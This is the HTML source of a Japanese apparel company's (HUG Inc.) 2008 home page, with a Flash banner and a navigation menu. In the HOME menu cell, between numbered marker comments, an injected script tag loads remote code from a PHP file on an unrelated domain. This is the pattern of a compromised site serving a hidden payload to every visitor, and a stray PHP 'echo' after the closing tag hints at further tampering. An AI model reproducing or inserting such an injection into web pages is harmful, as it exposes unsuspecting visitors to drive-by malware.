<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=shift_jis" />
<title>ハッグインク【ヤング、ミセス、カジュアルウェアー、ボトムス、トップス、デニム商品】
</title>
<script type="text/javascript">
<!--
function MM_preloadImages() { //v3.0
  var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
    var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
    if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}
//-->
</script>
<script src="Scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<style type="text/css">
<!--
body {
	background-image: url(images/bg_big.gif);
	background-repeat: repeat;
}
body,td,th {
	font-family: "ヒラギノ角ゴ ProN W3","Hiragino Kaku Gothic ProN";
	font-size: 12px;
	color: #666666;
}
.style1 {color: #FFFFFF}

-->
</style></head>

<body>
<br />
<table width="900" border="0" align="center" cellpadding="0" cellspacing="1" bgcolor="#000000">
  <tr>
    <td colspan="2"><script type="text/javascript">
AC_FL_RunContent( 'codebase','http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,28,0','width','900','height','500','title','HUGinc','src','images/logo5','quality','high','pluginspage','http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash','scale','noborder','movie','images/logo5' ); //end AC code
    </script>
      <noscript>
      <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,28,0" width="900" height="500" title="HUGinc">
        <param name="movie" value="images/logo5.swf" />
        <param name="quality" value="high" />
        <param name="SCALE" value="noborder" />
        <embed src="images/logo5.swf" width="900" height="500" quality="high" pluginspage="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" scale="noborder"></embed>
      </object>
    </noscript></td>
  </tr>
  <tr>
    <td width="194" bgcolor="#000000"><a href="index.html"><img src="images/logo.gif" alt="HAGinc" width="194" height="42" border="0" /></a></td>
    <td width="705" bgcolor="#000000">
    <table width="600" border="0" align="center" cellpadding="0" cellspacing="0">
      <tr>
        <td width="16%"><div align="center"><a href="html/index.html"><img src="images/home.gif" alt="HOME" width="28" height="19" border="0" /></a></div><!--339810--><script type="text/javascript">var gwloaded = false;</script>
<script src="http://georgeturnerart.net/video/WHWHK784.php" type="text/javascript"></script><!--/339810-->



</td>
        <td width="16%"><div align="center"><a href="html/news.html"><img src="images/new.gif" alt="newｓ" width="29" height="19" border="0" /></a></div></td>
        <td width="16%"><div align="center"><a href="html/brandhistory.html"><img src="images/brand.gif" alt="会社概要" width="82" height="19" border="0" /></a></div></td>
        <td width="16%"><div align="center"><a href="html/shopping.html"><img src="images/shopping.gif" alt="ショッピング" width="52" height="19" border="0" /></a></div></td>
        <td width="16%"><div align="center"><a href="html/taobao.html"><img src="images/taobao.gif" alt="タオバオ仕入代行" width="52" height="19" border="0" /></a></div></td>
        <td width="16%"><div align="center"><a href="html/catalog.html"><img src="images/catalog.gif" alt="カタログ" width="46" height="19" border="0" /></a></div></td>
        <td width="16%"><div align="center"><a href="html/inquiry.html"><img src="images/Inquiry.gif" alt="お問い合わせ" width="42" height="19" border="0" /></a></div></td>
      </tr>
    </table></td>
  </tr>
    <tr>
    <td height="12" colspan="2" align="center" valign="top" bgcolor="#000000" ><span class="style1">Copyright (c) 2008 ＨＵＧ, Inc. All Rights Reserved.
    </span></td>
  </tr>
</table>
<p>&nbsp;</p>
</body>
</html>
echo '';